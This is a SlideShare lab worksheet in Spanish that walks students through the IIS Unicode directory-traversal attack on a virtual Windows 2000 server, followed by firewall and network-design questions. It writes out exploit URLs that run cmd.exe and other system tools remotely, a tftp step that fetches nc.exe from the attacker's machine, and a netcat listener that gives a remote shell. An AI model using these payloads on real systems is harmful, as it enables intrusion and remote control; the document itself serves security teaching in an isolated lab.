SlideShare una empresa de Scribd logo

Seguridad: Ataque UNICODE

Francesc Perez
Francesc Perez
Educación
1 de 3
Descargar para leer sin conexión
1. Instale VMWARE7 de forma típica 2. Instale Windows 2000 Server en una máquina virtual con las opciones por defecto. Cuando elija el tamaño de disco utilizado sustituya 40GB por 2GB! 3. Una vez instalado el servidor abra su navegador y en URL introduzca http://localhost 1. ¿Tiene instalado el servidor web de Windows? ¿Qué nombre recibe? 2. ¿Qué versión es? 3. ¿Hay algún antivirus o Host IDS instalado? 4. Instale Windows 2000 Professional en otra máquina virtual. Cuando elija el tamaño de disco utilizado sustituya 40GB por 2GB! 5. El escenario que se quiere emular es el de la figura. Ataque UNICODE Francesc Pérez Fdez. 6. Desde MSDOS averigüe la IP del cliente y del servidor, haga un test de conectividad y verifique que se ven a nivel de capa 3. ¿Qué comandos ha utilizado? 7. Haga un barrido de puertos desde el cliente al servidor. ¿Qué programa ha utilizado? ¿En qué puertos el servidor espera peticiones? ¿A qué aplicaciones pertenecen dichos puertos y cuál es su función?
8. Desde el cliente haga un telnet al servidor por el puerto 80. ¿Qué comando ha utilizado? Pulse “enter” dos veces consecutivamente. ¿Qué mensaje muestra la salida de este comando? ¿Qué tipo y versión de servidor web está en ejecución en el servidor? 9. Busque en Internet información sobre el ataque UNICODE y descríbalo. ¿Se ajusta este ataque al escenario planteado? 10. Ataque: a. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/cmd.exe?+/c+dir+c: ¿Qué muestra el servidor? b. Desde el navegador del cliente ir a Ataque UNICODE Francesc Pérez Fdez. b. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/ipconfig.exe?+/all ¿Qué muestra el servidor? c. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/net.exe?+view ¿Qué muestra el servidor? d. Cree una carpeta compartida en el servidor. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/net.exe?+view+IP_SER VER ¿Qué muestra el servidor? e. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/nbtstat.exe?+"- a"+IP_SERVER ¿Qué muestra el servidor?
10. Ataque: f. Instale el servidor TFTP en el cliente y copie en la carpeta el programa nc.exe que nos permitirá tener una shell remota en el servidor. g. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/tftp.exe?"- i"+IP_CLIENTE+GET+nc.exe ¿Qué muestra el servidor? ¿Qué hemos hecho en este paso? Mire el contenido de la carpeta C:/Inetpub/scripts. Copie el resto de archivos de la carpeta de nc11nt, en caso contrario no funcionará! h. Ejecutaremos de forma remota la herramienta nc.exe desde el cliente. Para ello ir al navegador del cliente e introducir en la URL http://IP_SERVER/scripts/nc.exe?- l+-p+80+-t+-e+cmd.exe Especificamos que la conexión se realice mediante el Ataque UNICODE Francesc Pérez Fdez. l+-p+80+-t+-e+cmd.exe Especificamos que la conexión se realice mediante el puerto 80, que se quede en modo listening (esperando conexión entrante) y que después de la conexión se ejecute el programa cmd.exe i. Desde un cmd del cliente ejecute “nc IP_SERVER 80”. ¿Qué muestra la salida de dicho comando? ¿Dónde se encuentra? 11. ¿Solucionaría poner un firewall entre el cliente y el servidor? Explique por qué. 12. Dibuje con Edraw o Visio una arquitectura de red con los dispositivos software y hardware necesarios para crear un acceso seguro al servidor un detectar ataques UNICODE. Explique la función de cada elemento.

Recomendados

Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónFrancesc Perez
 
Practica 5 IRDT
Practica 5 IRDTPractica 5 IRDT
Practica 5 IRDTERIKLOPEZ97
 
Uso de packet tracer para ver las unidades de datos del protocolo
Uso de packet tracer para ver las unidades de datos del protocoloUso de packet tracer para ver las unidades de datos del protocolo
Uso de packet tracer para ver las unidades de datos del protocoloCristian Fory
 
Irdt practica 5
Irdt practica 5Irdt practica 5
Irdt practica 5galajainthemoon
 
Actividad n° 05
Actividad n° 05Actividad n° 05
Actividad n° 05Elky Rubí Mostacero
 
LEVANTAR SERVIDOR FTP EN CENTOS
LEVANTAR SERVIDOR FTP EN CENTOSLEVANTAR SERVIDOR FTP EN CENTOS
LEVANTAR SERVIDOR FTP EN CENTOSIsaac Huashua Huarcaya
 
Practica 3 irdt
Practica 3 irdtPractica 3 irdt
Practica 3 irdtgalajainthemoon
 
Práctica 11
Práctica 11Práctica 11
Práctica 11AlbertoDD
 

Recomendados

Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónFrancesc Perez
 
Practica 5 IRDT
Practica 5 IRDTPractica 5 IRDT
Practica 5 IRDTERIKLOPEZ97
 
Uso de packet tracer para ver las unidades de datos del protocolo
Uso de packet tracer para ver las unidades de datos del protocoloUso de packet tracer para ver las unidades de datos del protocolo
Uso de packet tracer para ver las unidades de datos del protocoloCristian Fory
 
Irdt practica 5
Irdt practica 5Irdt practica 5
Irdt practica 5galajainthemoon
 
Actividad n° 05
Actividad n° 05Actividad n° 05
Actividad n° 05Elky Rubí Mostacero
 
LEVANTAR SERVIDOR FTP EN CENTOS
LEVANTAR SERVIDOR FTP EN CENTOSLEVANTAR SERVIDOR FTP EN CENTOS
LEVANTAR SERVIDOR FTP EN CENTOSIsaac Huashua Huarcaya
 
Practica 3 irdt
Practica 3 irdtPractica 3 irdt
Practica 3 irdtgalajainthemoon
 
Práctica 11
Práctica 11Práctica 11
Práctica 11AlbertoDD
 
Práctica 11
Práctica 11Práctica 11
Práctica 11AlbertoDD
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bisFrancesc Perez
 
N i-k-t-o
N i-k-t-oN i-k-t-o
N i-k-t-oRafael Ibarra Alvarez
 
Unidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmosUnidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmosBenjamin Ortiz
 
Practica 5 comando netstat en windows
Practica 5 comando netstat en windowsPractica 5 comando netstat en windows
Practica 5 comando netstat en windowsROLO36
 
Nikto
Nikto Nikto
Nikto Rafael Ibarra Alvarez
 
Sockets tcp
Sockets tcpSockets tcp
Sockets tcpjacquelinemonjaraz
 
Nesuss sebastianm98
Nesuss sebastianm98Nesuss sebastianm98
Nesuss sebastianm98Sebastian Mayorga
 
Acceso remoto vnc
Acceso remoto vncAcceso remoto vnc
Acceso remoto vncperla guerrero
 
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...Agencia Aduanera Almeida
 
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+DinLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+DinLabFIB
 
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]David García Lopez
 
Practica#12
Practica#12Practica#12
Practica#12Violetita Pesantez Jimenez
 
Instalacion de un servidor proxy
Instalacion de un servidor proxyInstalacion de un servidor proxy
Instalacion de un servidor proxyalfredoariasjimenez
 
Practica 1
Practica 1Practica 1
Practica 1Julio Padilla
 
Practica 1
Practica 1Practica 1
Practica 1Julio Padilla
 
Memoria sere jpiris
Memoria sere jpirisMemoria sere jpiris
Memoria sere jpirisfjpiris
 
Práctica 11
Práctica 11Práctica 11
Práctica 11ManixGames
 
Servidorweb
ServidorwebServidorweb
ServidorwebGabriel Sumoza
 
Requisitos jin
Requisitos jinRequisitos jin
Requisitos jinGina Rodriguez Cando
 
Practica 11 irdt
Practica 11 irdtPractica 11 irdt
Practica 11 irdtERIKLOPEZ97
 
Creando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu ServerCreando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu ServerAlejandro Moreno
 

Más contenido relacionado

La actualidad más candente

Práctica 11
Práctica 11Práctica 11
Práctica 11AlbertoDD
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bisFrancesc Perez
 
Unidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmosUnidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmosBenjamin Ortiz
 
Practica 5 comando netstat en windows
Practica 5 comando netstat en windowsPractica 5 comando netstat en windows
Practica 5 comando netstat en windowsROLO36
 

La actualidad más candente (8)

Práctica 11
Práctica 11Práctica 11
Práctica 11
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bis
 
N i-k-t-o
N i-k-t-oN i-k-t-o
N i-k-t-o
 
Unidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmosUnidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmos
 
Practica 5 comando netstat en windows
Practica 5 comando netstat en windowsPractica 5 comando netstat en windows
Practica 5 comando netstat en windows
 
Nikto
Nikto Nikto
Nikto
 
Sockets tcp
Sockets tcpSockets tcp
Sockets tcp
 
Nesuss sebastianm98
Nesuss sebastianm98Nesuss sebastianm98
Nesuss sebastianm98
 

Similar a Seguridad: Ataque UNICODE

188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...Agencia Aduanera Almeida
 
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+DinLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+DinLabFIB
 
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]David García Lopez
 
Instalacion de un servidor proxy
Instalacion de un servidor proxyInstalacion de un servidor proxy
Instalacion de un servidor proxyalfredoariasjimenez
 
Memoria sere jpiris
Memoria sere jpirisMemoria sere jpiris
Memoria sere jpirisfjpiris
 
Practica 11 irdt
Practica 11 irdtPractica 11 irdt
Practica 11 irdtERIKLOPEZ97
 
Creando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu ServerCreando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu ServerAlejandro Moreno
 
Ejercicio windows7 repaso
Ejercicio windows7 repasoEjercicio windows7 repaso
Ejercicio windows7 repasoemiliojromero
 
Manual elastix1
Manual elastix1Manual elastix1
Manual elastix1paulhigv
 
Conexión remota con go tomypc equipo #1
Conexión remota con go tomypc equipo #1Conexión remota con go tomypc equipo #1
Conexión remota con go tomypc equipo #1MARYNECHAN31
 

Similar a Seguridad: Ataque UNICODE (20)

Acceso remoto vnc
Acceso remoto vncAcceso remoto vnc
Acceso remoto vnc
 
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
 
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+DinLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
 
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
 
Practica#12
Practica#12Practica#12
Practica#12
 
Instalacion de un servidor proxy
Instalacion de un servidor proxyInstalacion de un servidor proxy
Instalacion de un servidor proxy
 
Practica 1
Practica 1Practica 1
Practica 1
 
Practica 1
Practica 1Practica 1
Practica 1
 
Memoria sere jpiris
Memoria sere jpirisMemoria sere jpiris
Memoria sere jpiris
 
Práctica 11
Práctica 11Práctica 11
Práctica 11
 
Servidorweb
ServidorwebServidorweb
Servidorweb
 
Requisitos jin
Requisitos jinRequisitos jin
Requisitos jin
 
Practica 11 irdt
Practica 11 irdtPractica 11 irdt
Practica 11 irdt
 
Creando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu ServerCreando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu Server
 
Ejercicio windows7 repaso
Ejercicio windows7 repasoEjercicio windows7 repaso
Ejercicio windows7 repaso
 
Manual elastix1
Manual elastix1Manual elastix1
Manual elastix1
 
Conexión remota con go tomypc equipo #1
Conexión remota con go tomypc equipo #1Conexión remota con go tomypc equipo #1
Conexión remota con go tomypc equipo #1
 
Nagios
NagiosNagios
Nagios
 
Herramientas de-diagnostico-y-monitoreo
Herramientas de-diagnostico-y-monitoreoHerramientas de-diagnostico-y-monitoreo
Herramientas de-diagnostico-y-monitoreo
 
Presentacion buena trabajo largo
Presentacion buena trabajo largoPresentacion buena trabajo largo
Presentacion buena trabajo largo
 

Más de Francesc Perez

Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPFrancesc Perez
 
Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónFrancesc Perez
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Francesc Perez
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Francesc Perez
 
Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solFrancesc Perez
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2 Francesc Perez
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorFrancesc Perez
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3Francesc Perez
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicasFrancesc Perez
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales pràctica 1Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales pràctica 1Francesc Perez
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleFrancesc Perez
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Francesc Perez
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleFrancesc Perez
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaFrancesc Perez
 
La fuente de alimentación
La fuente de alimentación La fuente de alimentación
La fuente de alimentación Francesc Perez
 

Más de Francesc Perez (20)

ICT Parte 1/2
ICT Parte 1/2ICT Parte 1/2
ICT Parte 1/2
 
Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTP
 
Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP Solución
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
 
Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 sol
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Seguridad: Backtrack1
Seguridad: Backtrack1Seguridad: Backtrack1
Seguridad: Backtrack1
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: Multiplexador
 
Js api formularios
Js api formulariosJs api formularios
Js api formularios
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicas
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales pràctica 1Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales pràctica 1
 
html5 multimedia
html5 multimedia html5 multimedia
html5 multimedia
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de boole
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
 
Estudio del PC
Estudio del PCEstudio del PC
Estudio del PC
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de boole
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
 
La fuente de alimentación
La fuente de alimentación La fuente de alimentación
La fuente de alimentación
 

Último

OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxOLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxjosetrinidadchavez
 
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdfPlanificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
texto argumentativo, ejemplos y ejercicios prácticos
texto argumentativo, ejemplos y ejercicios prácticostexto argumentativo, ejemplos y ejercicios prácticos
texto argumentativo, ejemplos y ejercicios prácticosisabeltrejoros
 
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzel CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzprofefilete
 
La Función tecnológica del tutor.pptx
La Función tecnológica del tutor.pptxLa Función tecnológica del tutor.pptx
La Función tecnológica del tutor.pptxJunkotantik
 
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.pptDE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.pptELENA GALLARDO PAÚLS
 
Neurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdfNeurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdfDemetrio Ccesa Rayme
 
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdf
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdfResolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdf
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
Heinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativoHeinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativoFundación YOD YOD
 
GLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docx
GLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docxGLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docx
GLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docxAleParedes11
 
Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.José Luis Palma
 
Informatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosInformatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosCesarFernandez937857
 
2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdf2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdfBaker Publishing Company
 
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIARAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIACarlos Campaña Montenegro
 
Identificación de componentes Hardware del PC
Identificación de componentes Hardware del PCIdentificación de componentes Hardware del PC
Identificación de componentes Hardware del PCCesarFernandez937857
 
Historia y técnica del collage en el arte
Historia y técnica del collage en el arteHistoria y técnica del collage en el arte
Historia y técnica del collage en el arteRaquel Martín Contreras
 

Último (20)

OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxOLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
 
Sesión de clase: Defendamos la verdad.pdf
Sesión de clase: Defendamos la verdad.pdfSesión de clase: Defendamos la verdad.pdf
Sesión de clase: Defendamos la verdad.pdf
 
Defendamos la verdad. La defensa es importante.
Defendamos la verdad. La defensa es importante.Defendamos la verdad. La defensa es importante.
Defendamos la verdad. La defensa es importante.
 
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdfPlanificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdf
 
texto argumentativo, ejemplos y ejercicios prácticos
texto argumentativo, ejemplos y ejercicios prácticostexto argumentativo, ejemplos y ejercicios prácticos
texto argumentativo, ejemplos y ejercicios prácticos
 
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzel CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
 
La Función tecnológica del tutor.pptx
La Función tecnológica del tutor.pptxLa Función tecnológica del tutor.pptx
La Función tecnológica del tutor.pptx
 
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.pptDE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
 
Neurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdfNeurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdf
 
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdf
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdfResolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdf
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdf
 
Heinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativoHeinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativo
 
GLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docx
GLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docxGLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docx
GLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docx
 
Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.
 
Presentacion Metodología de Enseñanza Multigrado
Presentacion Metodología de Enseñanza MultigradoPresentacion Metodología de Enseñanza Multigrado
Presentacion Metodología de Enseñanza Multigrado
 
Informatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosInformatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos Básicos
 
2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdf2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdf
 
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIARAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
 
Identificación de componentes Hardware del PC
Identificación de componentes Hardware del PCIdentificación de componentes Hardware del PC
Identificación de componentes Hardware del PC
 
Historia y técnica del collage en el arte
Historia y técnica del collage en el arteHistoria y técnica del collage en el arte
Historia y técnica del collage en el arte
 
La Trampa De La Felicidad. Russ-Harris.pdf
La Trampa De La Felicidad. Russ-Harris.pdfLa Trampa De La Felicidad. Russ-Harris.pdf
La Trampa De La Felicidad. Russ-Harris.pdf
 

Seguridad: Ataque UNICODE

  • 1. 1. Instale VMWARE7 de forma típica 2. Instale Windows 2000 Server en una máquina virtual con las opciones por defecto. Cuando elija el tamaño de disco utilizado sustituya 40GB por 2GB! 3. Una vez instalado el servidor abra su navegador y en URL introduzca http://localhost 1. ¿Tiene instalado el servidor web de Windows? ¿Qué nombre recibe? 2. ¿Qué versión es? 3. ¿Hay algún antivirus o Host IDS instalado? 4. Instale Windows 2000 Professional en otra máquina virtual. Cuando elija el tamaño de disco utilizado sustituya 40GB por 2GB! 5. El escenario que se quiere emular es el de la figura. Ataque UNICODE Francesc Pérez Fdez. 6. Desde MSDOS averigüe la IP del cliente y del servidor, haga un test de conectividad y verifique que se ven a nivel de capa 3. ¿Qué comandos ha utilizado? 7. Haga un barrido de puertos desde el cliente al servidor. ¿Qué programa ha utilizado? ¿En qué puertos el servidor espera peticiones? ¿A qué aplicaciones pertenecen dichos puertos y cuál es su función?
